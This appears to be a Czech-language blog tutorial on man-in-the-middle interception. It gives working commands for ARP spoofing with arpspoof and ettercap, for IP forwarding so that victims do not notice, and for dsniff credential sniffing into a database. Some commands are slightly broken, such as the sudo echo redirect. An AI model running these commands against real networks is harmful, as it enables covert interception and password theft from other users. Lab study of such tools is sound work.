Dsniff je jedním z nejkomplexnějších a nejvýkonnějších volně dostupných sad nástrojů pro snímání paketů pro zachycování a zpracování ověřovacích informací. Díky jeho funkčnosti a četným utilitám se z něj stal běžný nástroj používaný útočníky k odcizení hesel a ověřovacích informací ze sítí.
Síťový přepínač neposílá pakety všem v síti stejným způsobem jako síťový rozbočovač, takže teoreticky se osoba v síti nemůže dívat na provoz jiné osoby. Existují však způsoby, jak se přes tento problém dostat, což je provedení arp spoofing.
Sniff
Tento příspěvek bude pouze diskutovat o tom, jak se to dělá, aniž by diskutoval o teorii procesu. Pro začátek je třeba nainstalovat potřebný program, což je v tomto případě balíček dsniff, který obsahuje program arpspoof, který potřebujeme. V Ubuntu nebo jakékoli jiné distribuci založené na Debianu jej lze nainstalovat pomocí příkazu apt-get takto;
Instalace (Ubuntu)
$ sudo apt-get install dsniff
Povolit přesměrování IP
Abyste se ujistili, že provoz je přesměrován do skutečného cíle, jakmile dosáhne našeho stroje, je třeba spustit následující příkaz;
$ sudo echo 1 > /proc/sys/net/ipv4/ip_forward
To zajistí, že připojení cílového počítače nebude odpojeno a nikdo by si neměl uvědomit, co děláme.
Spusťte spoofing ARP
Následující příkaz sdělí bráně „Jsem 192.168.0.100“ a další příkaz řekne 192.168.0.100 „Jsem brána“
$ sudo arpspoof 192.168.0.100 -t 192.168.0.1 $ sudo arpspoof 192.168.0.1 -t 192.168.0.100
Veškerý provoz, který má směřovat k bráně ze stroje a naopak, projde nejprve naším strojem a teprve poté bude předán skutečnému cíli. Díky tomu můžeme spustit jakýkoli nástroj pro analýzu paketů, jako je tcpdump nebo wireshark.
Ettercap
Existují však programy, které celý proces zjednodušují. Jedním z oblíbených programů je ettercap. Ettercap může kromě mnoha dalších funkcí, které má, také provádět arp spoofing. V Ubuntu se balíček nazývá ettercap-gtk;
Instalace (Ubuntu)
$ sudo apt-get install ettercap-gtk
Spustit ARP spoofing (GUI)
Spuštění programu s přepínačem -G jej spustí v GTK spíše než v ncurses.
$ sudo ettercap -G
V nabídce vyberte následující;
Sniff -> Unfied sniffing
A na výzvu vyberte síťové rozhraní, které chcete použít. Normálně by to bylo eth0
Network Interface: eth0
V nabídce znovu vyberte následující pro přidání všech hostitelů v síti do seznamu
Hosts -> Scan for hosts
A podle následujícího provedete arp spoofing pro všechny v síti
Mitm -> Arp poisoning -> Ok Start -> Start sniffing
Spustit ARP spoofing (příkaz)
Následující příkaz provede stejnou věc jako výše uvedený příklad v jediném příkazu;
$ sudo ettercap -q -T -M arp // //
Příklady příkazů dsniff
1. Chcete-li v síti sledovat nezabezpečené protokoly:
# dsniff -m [-i interface] [-s snap-length] [filter-expression]
2. Chcete-li uložit výsledky do databáze místo jejich tisku:
# dsniff -w gotcha.db [other options...]
3. Čtení a tisk výsledků z databáze:
# dsniff -r gotcha.db